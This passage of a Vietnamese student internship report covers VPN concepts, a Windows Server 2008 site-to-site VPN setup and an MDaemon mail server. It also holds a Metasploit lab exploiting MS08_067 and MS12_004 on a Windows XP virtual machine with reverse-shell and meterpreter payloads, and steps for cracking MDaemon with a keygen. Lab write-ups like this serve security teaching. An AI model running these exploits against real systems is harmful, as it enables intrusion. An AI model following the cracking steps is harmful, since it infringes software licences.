sử dụng có thể gọi một số miễn phí để liên hệ với NAS và dùng phần mềm VPN
máy khách để truy cập vào mạng riêng của công ty. Loại VPN này cho phép các kết
nối an toàn, có mật mã.
Hình minh họa cho thấy kết nối giữa Văn phòng chính và "Văn phòng" tại gia hoặc
nhân viên di động là loại VPN truy cập từ xa).
VPN điểm-nối-điểm là việc sử dụng mật mã dành cho nhiều người để kết nối nhiều
điểm cố định với nhau thông qua một mạng công cộng như Internet. Loại này có thể
dựa trên Intranet hoặc Extranet. Loại dựa trên Intranet: Nếu một công ty có vài địa
điểm từ xa muốn tham gia vào một mạng riêng duy nhất, họ có thể tạo ra một VPN
intranet (VPN nội bộ) để nối LAN với LAN.
Loại dựa trên Extranet: Khi một công ty có mối quan hệ mật thiết với một công ty
khác (ví dụ như đối tác cung cấp, khách hàng...), họ có thể xây dựng một VPN
extranet (VPN mở rộng) kết nối LAN với LAN để nhiều tổ chức khác nhau có thể
làm việc trên một môi trường chung.

58. 50
Trong hình minh họa trên, kết nối giữa Văn phòng chính và Văn phòng từ xa là loại
VPN Intranet, kết nối giữa Văn phòng chính với Đối tác kinh doanh là VPN
Extranet.
1.3. Bảo mật trong VPN
Tường lửa (firewall) là rào chắn vững chắc giữa mạng riêng và Internet. Bạn có thể
thiết lập các tường lửa để hạn chế số lượng cổng mở, loại gói tin và giao thức được
chuyển qua. Một số sản phẩm dùng cho VPN như router 1700 của Cisco có thể
nâng cấp để gộp những tính năng của tường lửa bằng cách chạy hệ điều hành
Internet Cisco IOS thích hợp. Tốt nhất là hãy cài tường lửa thật tốt trước khi thiết
lập VPN.
Mật mã truy cập là khi một máy tính mã hóa dữ liệu và gửi nó tới một máy tính
khác thì chỉ có máy đó mới giải mã được. Có hai loại là mật mã riêng và mật mã
chung.
Mật mã riêng (Symmetric-Key Encryption): Mỗi máy tính đều có một mã bí mật để
mã hóa gói tin trước khi gửi tới máy tính khác trong mạng. Mã riêng yêu cầu bạn
phải biết mình đang liên hệ với những máy tính nào để có thể cài mã lên đó, để máy
tính của người nhận có thể giải mã được.
Mật mã chung (Public-Key Encryption) kết hợp mã riêng và một mã công cộng. Mã
riêng này chỉ có máy của bạn nhận biết, còn mã chung thì do máy của bạn cấp cho
bất kỳ máy nào muốn liên hệ (một cách an toàn) với nó. Để giải mã một message,
máy tính phải dùng mã chung được máy tính nguồn cung cấp, đồng thời cần đến mã
riêng của nó nữa. Có một ứng dụng loại này được dùng rất phổ biến là Pretty Good
Privacy (PGP), cho phép bạn mã hóa hầu như bất cứ thứ gì.
Giao thức bảo mật giao thức Internet (IPSec) cung cấp những tính năng an ninh cao
cấp như các thuật toán mã hóa tốt hơn, quá trình thẩm định quyền đăng nhập toàn
diện hơn.
IPSec có hai cơ chế mã hóa là Tunnel và Transport. Tunnel mã hóa tiêu đề (header)
và kích thước của mỗi gói tin còn Transport chỉ mã hóa kích thước. Chỉ những hệ
thống nào hỗ trợ IPSec mới có thể tận dụng được giao thức này. Ngoài ra, tất cả các
thiết bị phải sử dụng một mã khóa chung và các tường lửa trên mỗi hệ thống phải có
các thiết lập bảo mật giống nhau. IPSec có thể mã hóa dữ liệu giữa nhiều thiết bị
khác nhau như router với router, firewall với router, PC với router, PC với máy chủ.

59. 51
Máy chủ AAA là viết tắt của ba chữ Authentication (thẩm định quyền truy cập),
Authorization (cho phép) và Accounting (kiểm soát). Các server này được dùng để
đảm bảo truy cập an toàn hơn. Khi yêu cầu thiết lập một kết nối được gửi tới từ máy
khách, nó sẽ phải qua máy chủ AAA để kiểm tra. Các thông tin về những hoạt động
của người sử dụng là hết sức cần thiết để theo dõi vì mục đích an toàn.
1.4. Sản phẩm công nghệ dành cho VPN
Tùy vào loại VPN (truy cập từ xa hay điểm-nối-điểm), bạn sẽ cần phải cài đặt
những bộ phận hợp thành nào đó để thiết lập mạng riêng ảo. Đó có thể là:
- Phần mềm cho desktop của máy khách dành cho người sử dụng từ xa.
- Phần cứng cao cấp như bộ xử lý trung tâm VPN hoặc firewall bảo mật PIX.
- Server VPN cao cấp dành cho dịch vụ Dial-up.
- NAS (máy chủ truy cập mạng) do nhà cung cấp sử dụng để phục vụ người sử
dụng từ xa.
- Mạng VPN và trung tâm quản lý.
1.5. Bộ xử lý trung tâm VPN
Có nhiều loại máy xử lý VPN của các hãng khác nhau, nhưng sản phẩm của Cisco
tỏ ra vượt trội ở một số tính năng. Tích hợp các kỹ thuật mã hóa và thẩm định quyền
truy cập cao cấp nhất hiện nay, máy xử lý VPN được thiết kế chuyên biệt cho loại
mạng này. Chúng chứa các module xử lý mã hóa SEP, cho phép người sử dụng dễ
dàng tăng dung lượng và số lượng gói tin truyền tải. Dòng sản phẩm có các model
thích hợp cho các mô hình doanh nghiệp từ nhỏ đến lớn (từ100 cho đến 10.000
điểm kết nối từ xa truy cập cùng lúc).
1.6. Router dùng cho VPN
Thiết bị này cung cấp các tính năng truyền dẫn, bảo mật. Dựa trên hệ điều hành
Internet IOS của mình, hãng Cisco phát triển loại router thích hợp cho mọi trường
hợp, từ truy cập nhà-tới-văn phòng cho đến nhu cầu của các doanh nghiệp quy mô
lớn.
1.7. Tường lửa PIX của Cisco
Firewall trao đổi Internet riêng (Private Internet Exchange) bao gồm một cơ chế
dịch địa chỉ mạng rất mạnh, máy chủ proxy, bộ lọc gói tin, các tính năng VPN và
chặn truy cập bất hợp pháp.

60. 52
Thay vì dùng IOS, thiết bị này có hệ điều hành với khả năng tổ chức cao, xoay sở
được với nhiều giao thức, hoạt động rất mạnh bằng cách tập trung vào IP.
2. VPN SITE TO SITE
2.1. Chuẩn bị:
- 2 windows server 2008
- 2 windows 2007
+ Máy PC 1 windows 2007 có ip 192.168.1.2. máy này sẻ ping thông với PC
2 là windows server 2008 có địa chỉ ip là 192.168.1.1.
+ Máy PC 3 windows 2007 có ip 192.168.2.2 máy này sẻ ping thông với PC
4 là windows server 2008 có địa chỉ ip là 192.168.2.1.
2.2. Đặt IP cho 4 máy
Card Lan Card Cross
Server 1 10.0.0.1/24 192.168.1.1/24
Server 2 172.16.1.1/24 192.168.1.2/24
Client 1 10.0.0.2/24
Client 2 172.16.1.2/24
Tạo user saigon trên máy server 1
Tạo user hanoi trên máy server 2

61. 53
2.3. Tiến hành cấu hình trên 2 server.
Chọn properties ->chọn tab dial – in -> check chọn allow access
Trên máy server1
Vào server manager ->add roles

62. 54
Chọn network policy and access services -> next
Chọn routing and remote access services -> next
Như vậy là đã cài xong giờ đi cấu hình

63. 55
Vào start -> administrative ->routing and remote access
Chọn server -> click phải configure
Chọn Custom configuration -> next

64. 56
Chọn VPN access + Demand – dial connections + Lan routing -> next
Chọn start service
Chọn tab Network interface -> click phải chọn new demand-dial interface

65. 57
Nhập interface name : saigon -> next
Check connect using vitual private networking (VPN) ->next
Check chọn point to point -> next

66. 58
Nhập địa chỉ ip card CROSS của máy server2 -> next
Check chọn route ip + adda user account
Add static route 172.16.2.0 (đường mạng LAN của máy server2) -> next

67. 59
Nhập password của user saigon mình đã tạo ban đầu -> next
Nhập user name :hanoi
Password của user hanoi mình đã tạo ban đầu -> next
Chọn properties server

68. 60
Chọn tab IPv4 và add vào chuỗi địa chỉ ip sẽ nhận khi connect vào
Apply + OK
Properties network interface saigon vừa tạo

69. 61
Chọn tab L2Tp ipsec VPN và nhập key
Properties server chọn tab security -> check chọn allow custom IP sec policy for
L2TP connection -> Apply -> OK
Click phải network interface saigon ở server1 -> chọn connect

70. 62
Click phải network interface hanoi ở server2 -> chọn connect
Xem kết quả connected rồi qua máy client 1 ping máy client 2 và ngược lại để xem
kết quả
2.4. Kiểm tra.
Lúc này từ PC1 sẻ ping thông qua PC4.

71. 63
Chương 9
MAIL TRÊN VPS.
1. Cài đặt MDmoon v10.
Các bước cài đặt đã hướng dẫn trên localhost.
2. Cấu hình MDmoon v10.
Đăng ký Domain
Ta truy cập vào dot.tk để đăng ký domain
Sau khi chọn xong domain ta click GO.Click vào sử dụng DNS, chọn tab Dịch Vụ
DNS của Dot.tk, nhập IP của VPS vào 2 hàng địa chỉ Ip
Sau đó chọn thời gian duy trì domain

72. 64
Nhập ký tự để xác nhận là người sử dụng chứ không phải robot, rồi click : ĐĂNG
KÝ
Lựa chọn tài khoản quản lý tên miền:
Click “Đăng nhập vào My Dot” để tùy chỉnh các thông số cho domain

73. 65
Sau khi đăng nhập vào my.dot.tk. Ta click vào Go to domain hoặc Domain panel để
vào danh sách các domain đã đăng ký.
Lựa chọn domain cần đăng lý sau đó click Modify:
Cuối cùng là Save Changes.
Mail Server Mdaemon
Định Nghĩa:
Mail Server là một máy chủ cung cấp dịch vụ viết gửi và nhận thư trên internet.
Để tạo 1 mail server thì có nhiều phần mềm , nhưng nổi tiếng nhất đó là Mdaemon.
Các bước chuẩn bị:
1VPS làm Mail Server
Phần mềm Mdaemon bản pro
1 Domain đã add record (MX record).
Tiến hành:
Trên máy VPS ta cài Mdaemon và crack thành bản pro (vì bản pro mới cho phép
gởi và nhận mail từ các dịch vụ mail khác, con bản free chỉ cho gởi mail nội bộ)
Cách cài Mdaemon Pro:
Ta chạy file setup MDv10.exe

74. 66
Điền Lience name : (tùy chọn)
Company name: Tên Công Ty
Registration Key: Ta lấy trong keygen ở thư mục crack
Copy dãy chữ số này paste vào Registration Key Sau khi paste key vào ta click
Next.Lưu ý không check vào Install the Limited.

75. 67
Đợi quá trình cài đặt hoàn tất
Điền domain (mà ta đã đang ký ở dot.tk lúc nãy vào) Domain name
Điền vào tên và địa chỉ mail cũng như mật khẩu cho tài khoảng admin

76. 68
Điền vào IP của VPS :
Click Next
Ta bỏ dầu check( Không chọn vào) ở “Start MDAEMON”

77. 69
Copy file Mdaemon.exe trong thư mục crack vào thư mục cài đặt Mdaemon
(C:Mdaemonapps) rồi khởi động Mdeamon
Click Yes
Ta khỏi động Mdaemon lên rồi tạo User mail

78. 70
Ta vào Account>>New Account để tạo users
Ta tạo User nguyen van a:

79. 71
Để bỏ giới hạn password->account->account setting>bỏ check requite strong pw
Tạo thêm một tài khoản nguyễn văn b

80. 72
Xem cấu hình các tài khoản:vào account>edit account
Test Trong IE gõ địa chỉ http://192.168.1.1:3000
Đăng nhập tài khoản nguyen van a

81. 73
Trên mail server ta dùng tài khoản nguyen van a gui mail cho nguyen van b
Đăng xuất và đăng nhập tương tự vào tài khoản nguyen van b

82. 74
Ta sẽ thấy được tin nhắn từ tài khoản a
Kết thúc mail mdeamon.

83. 75
Chương 10
CHƯƠNG 10: BẢO MẬT WINDOWS.
1. Khai thác lỗ hổng trên Windows XP với mã lỗi MS08_067
Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn công
nạn nhân)
Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là:
192.168.154.128
Các bước thực hiện:
Kiểm tra mạng giữa XP và máy Back Track 5r3:
Máy Back Track 5r3:
Máy Xp:

84. 76
Kiểm tra thông mạng:
Trên máy Back track 5r3 ta gõ đường dẫn: cd /pentest/exploits/framework
Ta tiếp tục gõ lệnh:
./msfcli windows/smb/ms08_067_netapi RHOST=192.168.154.129
LHOST=192.168.154.128 PAYLOAD=windows/shell/reverse_tcp

85. 77
Trong đó RHOST là IP máy Xp, LHOST là IP máy Back track 5r3.
Sau đó, ta chờ cho máy Back track 5r3 tấn công Xp
Cuối cùng ta đã tấn công được Xp, ta biết được các thông số của máy XP
2. Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004
Máy Backtrack 5r3 có IP là 192.168.1.2, máy xp có IP là 192.168.1.3
Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole

86. 78
Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004
Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.
Dùng lệnh show options để biết thêm các câu lệnh cần thiết.

87. 79
Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>
Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp
Dùng lệnh set LHOST <ip backtrack>
Dùng lệnh exploit để tiến hành khai thác lỗi.
Chú ý đường dẫn http://192.168.1.2:8080/nếu máy nạn nhân vào đường dẫn này sẽ
bị hack.

88. 80
Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là
192.168.1.3
Trên máy XP ta vào trình duyệt web và gõ đường dẫnhttp://192.168.1.2:8080/
Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ
Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó.
Trên máy back track ta gõ lệnh sessions để kiểm tra.

89. 81
Dùng lệnh sessions –i 1
Xem trước thông tin XP:

90. 82
Trên máy backtrack gõ getuid để biết thông tin máy Xp, và tài khoản đang truy cập.
Gõ sysinfo để biết thông tin chi tiết máy Xp:
Gõ lệnh shell để vào ổ đĩa máy XP:
Giờ thì ta có thể xem được các file trong ổ đĩa của máy XP.

91. 83
Chương 11
KẾT LUẬN
1. Các kết quả đạt được:
Sau khi tìm hiểu và triển khai các dịch vụ trên máy ảo VMWare và VPS em đã
có kiến thức về:
- Nguyên lý cơ bản của hệ điều hành mạng, kiến thức về hệ thống mạng, có kỹ
năng cần thiết để cài đặt, cấu hình hoàn chỉnh mạng doanh nghiệp cỡ vừa và
lớn dựa vào Windows Server 2008.
- Hiểu về cấu trúc hạ tầng, thiết kế và quản trị hệ thống mạng, nhiệm vụ quản lý
bao gồm việc điều hành và hỗ trợ hệ thống.
- Triển khai, thiết kế, quản lý và chuẩn đoán hỏng hóc cho một hệ thống mạng.
- Có các kiến thức trên nền tảng công nghệ Windows Server 2008.
2. Kinh nghiệm thực tế
- Có cái nhìn thực tế về việc cấu hình, quản lý một hệ thống mạng của một
doanh nghiệp thông qua nền tảng.
- Được trực tiếp tiếp xúc những công nghệ và thiết bị mà trước đây chỉ biết đến
thông qua sách vở.
- Được vận dụng những kiến thức tiếp thu trên lớp vào công việc thực tế.
- Bổ sung và trau dồi những thiếu sót về kiến thức trong quá trình học trên lớp.
- Trực tiếp triển khai và cấu hình trên máy chủ ảo VPS.
- Có kinh nghiệm trong việc khắc phục sự cố khi hệ thống gặp lỗi.
3. Hoàn thiện bản thân
- Các thành viên trong nhóm đã định hướng rõ ràng mục tiêu sắp tới sẽ làm.
- Tự tin hơn trong việc giao tiếp với mọi người trong công việc.
- Nâng cao khả năng làm việc nhóm cũng như khả năng tự bản thân giải quyết
vấn đề khó khăn gặp phải trong công việc.
4. Các kiến thức được lĩnh hội
- Kiến thức thực tế về hệ thống mạng của doanh nghiệp.
- Hiểu các thành phần công nghệ mạng doanh nghiệp vừa và nhỏ.

92. 84
5. Kết luận.
Nhìn chung các công việc em đã cơ bản hoàn thành, tuy nhiên sẽ còn nhiều
thiếu sót, đa phần là quá trình tự học. Vì thế mong Thầy cô, các bạn đánh giá và đưa
ra những ý kiến đóng góp để khắc phục và sửa chữa. Bên cạnh trình độ chuyên môn
cũng cần có những kỹ năng mềm như kỹ năng giao tiếp, làm việc nhóm cũng hết
sức quan trọng. Thực tập là giai đoạn quan trọng của sinh viên, giúp sinh viên có cơ
hội làm việc thực tế nhằm củng cố kĩ năng, chuẩn bị cho giai đoạn làm việc thật sau
khi tốt nghiệp.
Trong quá trình thực tập tại Trung tâm ATHENA, nhóm chúng em được tiếp xúc
với một môi trường làm việc chuyên nghiệp, các công nghệ, thiết bị,các mô hình
thực tế... Qua đó nhóm học hỏi được những kinh nghiệm nhất định và có những suy
nghĩ đóng góp sau:
 Về công việc: Để thiết kế và triển khai một hệ thống mạng cho một công ty, cần
có nhiều bộ phận phối hợp với nhau để thực hiện và hoàn thành dự án.
 Về phát triển kỹ năng:Để các bộ phận có thể phối hợp tốt mỗi nhân viên cần có
những kỹ năng cơ bản để làm việc trong đội, nhóm:
o Làm việc nhóm: Kỹ năng làm việc nhóm là khả năng làm việc hiệu quả
trong đội ngũ. Đó là việc có thể sử dụng đúng người để có được kết quả
tốt nhất và luôn sẵn sàng để có thể lãnh đạo hoặc phối hợp làm theo.
o Tìm hiểu – thu thập thông tin: Quản lý thông tin là khả năng biết được
nơi để có được thông tin cần thiết - để tìm kiếm, định vị, và thu thập nó.
Điều này có thể liên quan đến việc sử dụng các nguồn lực khác nhau, cho
dù chúng là từ những con người hoặc từ các tài liệu trong thế giới rộng
lớn của công nghệ
o Kỹ năng giải quyết vấn đề - Tính linh hoạt : Tính linh hoạt là khả năng
thích nghi để giải quyết công việc chúng ta gặp phải hàng ngày trong
công việc lẫn đời sống riêng. Giải quyết vấn đề là xác định vấn đề,
nghiên cứu giải pháp và đưa ra những quyết định hiệu quả.
 Về công nghệ: với lợi thế là công ty hoạt động trong lĩnh vực công nghệ thông
tin, ATHENA có hạ tầng CNTT hiện đại ,an toàn và thông suốt .

93. 85
 Clip giới thiệu bản thân :
https://www.facebook.com/huyiuh/videos/416768061817489/?ref=notif&notif_t=vi
deo_processed
https://www.youtube.com/watch?v=9haI8NRiedE
 Demo up youtube.com
Share permission: https://www.youtube.com/watch?v=Rl32CPUhcKo
NTFS Permission: https://www.youtube.com/watch?v=R5N_Gs_ICLI
FSR Manager : https://www.youtube.com/watch?v=OgD67PLnQeE
Disk quota: https://www.youtube.com/watch?v=T3Q_BwQJo7c
Domain: https://www.youtube.com/watch?v=9BaOz9v_HWs
HomeFolder userProfile: https://www.youtube.com/watch?v=p4nza3-JvTM
OU: https://www.youtube.com/watch?v=P9PGctl8MZY
Group policy managerment: https://www.youtube.com/watch?v=J-dqKQMGCOE
DeploySofttware: https://www.youtube.com/watch?v=lHtOKZRLWok
Remote desktop : https://www.youtube.com/watch?v=ImmbG3Cx10I
DHCP: https://www.youtube.com/watch?v=41JFHJQZHRM
IIS-DNS: https://www.youtube.com/watch?v=koZ2DwDB3FM
VPN: https://www.youtube.com/watch?v=QfiVwjotJoM
Mdaemon: https://www.youtube.com/watch?v=cTorSEuLjJ8
Phishing: https://www.youtube.com/watch?v=Ra1gRZGD4HU
 Slide share: